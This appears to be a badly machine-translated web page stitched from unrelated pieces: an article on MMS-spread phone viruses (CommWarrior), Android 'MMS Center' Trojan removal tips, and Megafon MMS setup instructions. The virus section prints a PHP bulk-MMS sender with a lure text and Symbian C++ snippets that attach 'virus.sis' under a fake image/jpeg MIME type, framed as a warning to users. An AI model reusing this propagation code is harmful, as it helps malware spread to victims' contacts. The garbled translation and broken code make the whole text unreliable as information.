Dodatok mms yak video center. Uwaga! Shakhrai develop viruses on Android via SMS and MMS

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Victory of the popular, especially among young MMS-service, there is at least some problems, about how many coristas are, unfortunately, not overlooked.

One fine day, you can reject the MMS message, either from your known phone number, or from an unknown phone number, or visit any of your stylist operator... Display it and infect your phone with a virus. Texts infected with MMS messages can be avenged information about those who are in addition to bezkostovna gra from your stylist operator, a new ringtone from one archive with photos from your daughter. All the time you need to download it, install it or save it on the memory card that has been added in the future. In some cases, in MMS, you can transfer information to any additional information, for example, archives in the Internet.

MMS-as soon as you see it on your mobile phone, you can not only infect your device with a virus, or if you see an infection on the phone number from your notebook.

Those who are not safe if your phone will be infected with a certain rank, you will be attacked by yourself mobile phone call from your contact list. So your friends, know your colleagues, will be removed from you by MMS message from the virus. Have your own phone number and your colleagues to find out the phone numbers from your address books. A similar process matime avalanche character і, in the end bag, can lead to mass infection of mobile attachments.

In this hour, more scenarios have not been broadened even further through those, where the popularity of MMS services is insufficient, but mobile internet kostuє expensive. Far from skinny koristuvach camp stylish phone I will attach the program to the archives, vvazhayuchi for brightening up the building at home on a stationary computer, it will be more economical.

On the other hand, in the minds of the fall of prices on the mobile Internet, there are unlimited tariffs, popularization of MMS-service, as well as with a general development of foreign technologies, add a scenario in a possible way.

MMS (Multimedia Messaging Service) is a service of occasional transmission, which will prevent automatic transmission of special multimedia messaging services to phone number but at the address e-mail... This technology has radically changed the number of services that a subscriber can use when transmitting every now and then. However, with the appearance of new possibilities, new urges appeared.

So, as the MMS technology allows you to transfer the add-on file at once, then the cym mechanism immediately accelerated the virus for its extension. In the Danish moment, it is already a bit more virus. Він carry the name CommWarrior. shkіdliva program enmity Nokia phones series 60 on the basis operating system Symbian. primitive and characteristic for its analogs on computers: a high-quality code is transmitted to mobile attachment in the view of the incoming MMS-view with the attachment of the media-file - a picture, audio or video recording.

In the middle of the most occasionally there is a text (all 20 new options are revealed), which is all about the subscriber styling link view attachments file. About those, like the virus itself, it will be said more, but leave it clear, like the evil one can be directly attacked. mobile phone beyond the MMS. The PHP script, views below, will be fed to send MMS messages via a commercial SMS gateway using the http / https protocol.

1 2 $ user = "user";
3 $ password = "password";
4 $ api_id = "xxx";
5 $ text = urlencode ("Uncategorized game from MegaPone, zavantazh i gray!");
6 $ to = "79035555555";
7 $ from = "MegaPone";
8 $ mms__url = "";
9 $ ret = file ("$user&password=$password&apijd=$apijd");
10 if ($ ret == "OK") (
11 for ($ 1 = 0; $ i<100; $i++)
12 {
13 $ ret = file ("$to8rtext=$text");
414 if ($ ret == "OK") echo "Success. Message was sent ";
15 }
16 }
17 else echo "Error. Message was not sent";

For a malicious user, the transmission of a message via an SMS-gateway, I would like to shorten the name that you can enter in the copyright holder a number that is supposed to be attacked, and in the text field - as if you can sponse the victim to see the investment. In the parameter $ mms_url win, I will set the address of the fast-paced one, roztasovany in the Internet. The subscriber number appears in the $ from parameter, and the text itself is in the $ text field.

MMS-message to the Commwarrior virus to send the text, when prompted to display the message, and the file commw.sis. Expansion of the attached SIS file to those who have the file є vikonuvanim for Symbian platforms - the most popular operating system for mobile attachments in Danish hour.

Remaining the version of the Commwarrior virus will help the victims of MMS in the future:

Theme: 3DNow!
Now: 3DGame from me. It is FREE!

Theme: MatrixRemover
Domain: Matrix has you. Remove matrix!

Theme: Nokia ringtoner
Now: Nokia RingtoneManager for all models.

In addition, as the Commwarrior SIS file will be installed, the files will be displayed in the folder:

\ System \ apps \ CommWarrior \ commwarrior.exe
\ System \ apps \ CommWarrior \ commrec.mdl

When you select commwarrior.exe, the virus is copied to folders

\ System \ updates \ commrec.mdl
\ System \ updates \ commwarrior.exe
\ System \ updates \ commw.sis

Send the file \ system \ updates \ commw.sis to the attack before sending MMS.

The details of the mechanism of the infection can be discerned behind the additional MMS. The instructions of the software "file" to the virus are incompatible with the world of security, and the code itself must be used before the MMS message is sent, and there is no way of tying it to a very complex virus.

Otzhe, there is a collection of viruses in the opening session for robots with a center of information. Fighting for the help of an offensive operator.

iSession = CMsvSession :: OpenAsyncL (* this);

Otrimaniy іdіkator of the session vikoristovutsya for the stem of the client, which will go back to the center of the day. Such a client is promoted by the offensive rank.

iMtmReg = CCIientMtmRegistry :: NewL (* iSession);

So, as the robot with the center is being conducted only to send MMS messages, it is necessary to check the re-creation of the opened client in the MMS client.

iMmsMtm = mstatic_cast
(IMtmReg-> NewMtmL (KUidMsgTypeMultimedia));

For that, as it is necessary for the front of the Viconan robot, the virus should go until the end of the MMS message itself. For the whole it is necessary, in the first place, to turn on the mobile phone. Fighting in such a way.

iMmsMtm-> SwitchCurrentEntryL (KMsvDraftEntryld);

The SwitchCurrentEntryL method, when you click on the Kmsv-DraftEntryld parameter, will show you, by the right hand, select the Drafts directory, so that the Chernetki directory is selected. In addition, as the catalog is designated, the MMS-option is listed with the parameters "for suggestions". Fighting for the help of the offensive wiklik:

iMmsMtm-> CreateMessageL (iMmsMtm-> DefaultServiceL ())

You need to format the main fields of the MMS message. For the other macro _LIT, the basic changes are initialized. In the operating system Symbian, the JLIT macro is set to change. With such a rank, from which assistance begins, the onset of change begins:

LIT (KSamsNumber, "07738123456");
_LIT (KSamsAlias, "Sam");
_LIT (KPetesNumber, "07812654321");
_LIT (KMessageSubject, "Nokia ringtoner");

Change can carry a good name. At the pointed application in the KSamsNumber change, the number is taken to be attacked by the subscriber, and in the opened KSamsAlias, the name is specified in the notebook. The change KPetesNumber will have the copy number, and the new KMessageSubject will contain the new topic. In addition, as all the changes have been formed, there is an initiation of the fields of the already opened MMS-message. Struggling for additional methods AddAddresseeL and SetSubjectL. The first method is to pass the EmsvRecipientTo parameter, which is the source field. The EmsvRecipientCc parameter initializes the Obtain field.

iMmsMtm-> AddAddresseeL (EMsvRecipientTo, KSamsNumber, KSamsAlias);
iMmsMtm-> AddAddresseeL (EMsvRecipientCc, KPetesNumber);
iMmsMtm-> SetSubjectL (KMessageSubject);

For a wide range of options, change from im'yam is closed until the file is added. The virus itself is sent to this message in MMS. To that, in the same way as the file, it will be used as a viral program.

LIT (KFileName, "virus.sis");

For that, since the change is initialized, an instance of the TfileName class is created, which will describe the attached message. For the additional Append method of the attached attachmentFile object, such data are initialized as going to the file and the file itself.

TFileName attachmentFile (KPhoneRootPath);
attachmentFile.Append (KDirPictures);
attachmentFile. Append (KFileName);

Pislya skoєnnya cikh diy virus voryu and describe the service information for the types of attached files. Name the virus by navmisno in order to specify the non-type attached to the file (mime-type), for example, JPG, but not suspecting an attack when sending a file via MMS. A mime tip is used to support the offensive program code.

CMsvMimeHeaders * mimeHeaders = CMsvMimeHeaders :: NewL ();
CleanupStack :: PushL (mimeHeaders);
SetSuggestedFilenameL (KFileName);

mimeType (KMimeType);

CMsvAttachment * attalnfo = CMsvAttachment :: NewL (CMsvAttachment :: EMsvFile);
CleanupStack :: PushL (attalnfo);
_UT8 (KMimeType, "image / jpeg");
TBufC8<10>mimeType (KMimeType);

The lines pointing in the direction describe those that are attached only to one file in the MMS-message. In addition, as all the necessary preparation of a viconane is required, the Create Attachment 2 L method is used and the MMS is triggered.

iMmsMtm-> CreateAttachment2L (
* Store,
* MimeHeaders,
CleanupStack :: Pop (attalnfo);
CleanupStack :: PopAndDestroy (mimeHeaders);

the formulation will eventually be completed with the help of the upcoming program rows.

store-> CommitL ();
attachment.Close ();
CleanupStack :: PopAndDestroy (attachment);
CleanupStack :: PopAndDestroy (store);

The sheet itself will be lost after additional preparation with the additional SaveMessageL () method.

iMmsMtm-> SaveMessageL ();

Nareshty vіdpravlya vіdpіtіyuє to be an offensive rank.

In such a rank, virus є is self-propagating. Describe how to implement a shkidliv part of the virus, as overpowering your personal data on the phone, we will not be for any reasonable reasons. Our meta is to get ahead of the koristuvach about the lack of security, and do not look at the evil-doer of the virus.


In order to secure your own stylish phone, you need to be careful when you reject MMS messages. Remember that you can attach the entire investment until you see it as a virus. It is far from the expectation of accepting MMS messages from unknown subscribers. If, as a matter of fact, it is of interest to you, then it is necessary to scan the supplements with an anti-virus for the presence of viruses.

As soon as the virus has consumed all the same on your mobile attachment, then the possibility of painlessly from now on will be bothered all the same. You can especially see a shkidlivy file, as you know, de yogo know. If you are attacked by an unviable virus, then it will happen for an hour or so. At the same time, you need to be careful, you can't see any system files.

In order to independently view the Commwarrior virus, you need a file manager to view system directories. For the help of the manager, you can view the \ system \ apps \ commwarrior folder from the memory of the mobile phone, and the commwarrior.exe and commrec viruses with special files added to them. mdl. In the catalog \ system \ updates \ commwarrior, you need to see the keys in the files commwarrior.exe, commrec.mdl and commw.sis. In the catalog \ system \ recogs, you can see the file commrec.mdl.

Who are you going to see?

Tricky virus hostile smartphones are quiet, but click on the power of the phone. The focus is great: every time you come to see someone on your contact list.

See the stench like this:

If the victim goes to the specified address on the victim's smartphone, a program with extensions will be added. apk.


Moreover, if you see a message, the program will be loaded into your phone (most often with apk extensions). In addition to financial costs, the program is scary, since your phone will also be repaired by sending sms and mms to your contacts from the list. The program itself is simply not vidkinesh: it’s blocking a banner with access to the list of additions and adjusting your smartphone.

With the program already more fate, at once Chergov's hvilya of rozsilok came.

what a robiti, I have come by now

Oops, I'm pushing ...

You can immediately bring the phone to the fakhivtsyam or try to get the "zagarbnik" yourself.

Plug in the SIM card with the attachment and attach the attachment to the "safe mode": if the smartphone is installed only after the "factory" add-on is installed. Todi you can go to the menu and view of the "zagarbnik".

Bezpechny mode is turned on on new smartphones in a different way.

Press and set the live button until the display menu appears.

Viberit the item "Vimknuti" or "Switch on liveness" and press it on a new finger until the axis of such a menu appears:

Natisnit OK and daughters re-enlistment. If you try to turn on, in the left codend you will be written "Safe mode".

On some smartphones, after pressing the "Vimknuti" button, you need to trim the button to change the function, so the "Safe Mode" will turn on.

It is more beautiful to google it, as it is to be included on the attachment of your model.

It’s necessary to know and see some useful supplements. Call me to be called SMS_S, SMS MMS, Send, Time, SMS Photo, MMS Photo, Foto or a similar rank.

Don't know? Try to see all recently installed programs one at a time. Whenever you need it, you will be able to get up to date.

Reload prist_y. Translate yogo into a virus for the help of a vbudovanny or hijacked antivirus. As soon as you fit in with the virus, do not go in, be brutalized to the faults.

The current subscribers of the mobile operator "Megafon" can see the possibility of exchanging pictures, melodies and video clips through the submission of a short multimedia message under the name "MMS". In general, MMS is a service that allows the subscriber to view his or her musical compositions and graphic images. As a rule, the part of the MMS will be able to completely lay down all the files transferred.

It is possible to trim and send MMS messages, you need to set up the following services:

  1. Switch on the "Mobile Internet" option,
  2. Replace the cable-free automatic settings on the operator's website,
  3. I will install it manually, you can find it on the Megafon website,
  4. Call for help in the office of the company,
  5. Call up to the mobile operator for connection services.

Yaksho Vi bazhaєte dіznatisya, yak nalashtuvati mms on Megaphone, I propose to you to get acquainted with the report instruction, pointed to our portal. We will help you, all the information you will receive will help you to solve the problem of fixing mms-occasionally in the best terms!

Yak switch mms on Megafon?

  • On the very cob, you will be prompted to see your browser and register the official website of Megafon in the address row.
  • Yak tilki Vi, go to the site, go to the site, check the "Vibir region" checkbox to be on the required mice. First of all, to what kind of insight is your protégé, and to vibrate the true meaning.
  • Go to "Private Clients". The qya tab is expanded at the upper part of the screen from the right side.
  • Slide to press on the tab "Help", and then to vibrate "Nalashtuvannya".
  • Let's start by making a brand name for your stylish phone. Yak tilki You should be sure of the exact model, I will not need to name it from the list.
  • If you send a message, you will be prompted to enter the code (Captcha). For that, when you enter yogo, press on the tab "Nadislati".
  • With a stretch of decіlkokh seconds to your mobile, a short sms-message will arrive with the report instructions of the given actions. You don’t need to get rid of the dontrimuvatisya їkh, and don’t bargain access to the mms-update.

Yaksho Vi bazhaєte nobles, like seeing mms on Megaphone, speed up with the description of the crocs to reject all the necessary information for the transmission of this problem.

How to enable mms on Megafon?

Do you have a definite situation, if you need to connect mms on Megafon? Would you like to be more aware of the services of the multimedia coverage? - Below are some ways to give you a unique opportunity to connect mms to your mobile phone in the shortest term!

  • For a successful mms connection on Megaphone, you need to dial on your mobile phone a combination of keys like "* 105 * 3 #" and press on Viklik. Tsim vimknit active service mms-occasionally.
  • For good reasons, they didn’t know to switch on the MMS-system, depending on the additional combination of keys, it’s my proponent for your respect. To dial the number "0500" on your phone, look for the autoinformer and type the number "0". In a matter of an hour you will be sent to the call by a Chergov operator, who will listen to your problem, send out the lines of transmission and give a competent view on the power supply. In other words, by holding out two or three hilines, you will remove the reports to deactivate the service mms-occasion.
  • You can also turn to the nearest office of the Megafon VAT. For an excessive application for the inclusion of services, you will need to present a document that will attend to your person. Such є passport is abo vodіyskі rights.
  • You can also enable the MMS service and you can visit the Megafon website. If we have already carried on the process, then you can learn more about it.
  • To deactivate the service mms-occasionally, you can use the "Service-Guide" system as soon as possible. Everything you need for the whole is the price of restoration in the service. You can read the detailed information about "Service-Guides" on the official website of Megafon.

Yaka mean vartist mms?

The average rate of SMS updates on Megafon is strictly to stay in the region. As it is already said, the price for one dispatch is varied from 5 to 15 rubles. For some regions, the parity may be one ruble (in shares), in deyakyh - twenty rubles.

Remember, scho otrimati mms - it means reminiscent of the messages, radio and emotions. Yakshho Vi bachite the squad with your child in the arms of a laughing squad is written by the curtains - about how the price for koristuvannya service can be done? How can you accept the knowledge that the child was born healthy? Riziknemo let it go, so the world will not be a penny for the whole world!

Do not mess with your senses and bazhan! Supervise the mms-see through the middle of the mobile operator Megafon - and give your loved ones joy and smiles!

Note: you can remove the MMS-as soon as possible, the subscriber can be deprived of the connected service of the update. If you didn’t connect the system, if you do not want to take it out the next day, please be glad to see the description, as we will send you our portal! Prior to your services: connecting to the MMS service for an additional call from the operator, sending SMS messages, dialing the necessary combination of keys, through Service-Guide, for an additional Internet link. The world is wider than spodіvaєmosya, wіth all types, selected by us for this nutrition, to help the skin subscriber of VAT "Megafon" and koristuvachevі on our website virіshity catering in nykorotshі terms!

Our current short article about the even more insecure infection of Android with viruses MMS Beeline Center and Tele 2. You can find out how not safe the virus and how the MMS center is.

With a bit of rock on Android phones, it’s becoming a tricky Trojan, which is even more cunning, masquerading as the official services of mobile operators, since there’s absolutely no problem.

Priyshov SMS - Exchange with surcharge

The ways of penetrating a virus to Android are even more abundant. Ale judging by the number of edgukivs, leading the penetration via SMS: "Proponymous exchange for an additional charge, photo axis." The sms also says the message, after sending it to the phone, the file is sent to the phone for infections - MMS Beeline Center or MMS Tele 2 Center.

Yak butt, koristuvach will add an offensive type of apk file to my phone - "photo_b23148121_img_obmen_s_doplatoy.apk"

For the installation, the "tsikave" itself should be repaired. All sms can be seen from the phone, from the mobile phone you are familiar with pennies, you can adjust the device, in addition, your phone can see keruvati. The axis yak is one of koristuvachіv stuck with such a problem:

There is no reason to come anyway from Avito, but not any special site can’t. Such a method is victorious by the shahrays through the popularity of the Internet resource and the great doviry to the new koristuvachiv. Lyudyna rozmіschu dumbfounded that she has given her own phone number, and the malevolent vikoristovuyu номерs number and form her base for sending SMS - "Exchange with additional payment."

Yak Vidality Virus MMS Center?

Troyan is registered in the telephone even more mintly and masqueraded as the service of mobile operators. A simple koristuvach doesn’t expect to get up immediately, and you can spend a penny on a mobile phone.

Having looked over the richly glances and propositions from the vision, I saw only one fair way. Otzhe, go over everything point by point:

  1. You will need to link your smartphone to ovenless mode... I want to look forward to your version of Android to be amazed on the Internet - there is enough information.
  2. go to nalashtuvannya.
  3. The list of options knows Bezpeka.
  4. Dalі, Administration - administrative buildings.
  5. We need to check the box next to the MMS-center.
  6. Now we go to the Program Manager and in the list we know the MMS-center.
  7. Onslaught і Clear the cache.
  8. Re-pre-mail your smartphone.

It’s still from the version, it’s possible to see it, but from the intuition, I think, everything is in order. It’s also a lot of fun to rewrite your phone with mobile antivirus software, including Dr. Web. Axis, for example, a video about analogous Trojans.

Get ready for the project - please, thank you!
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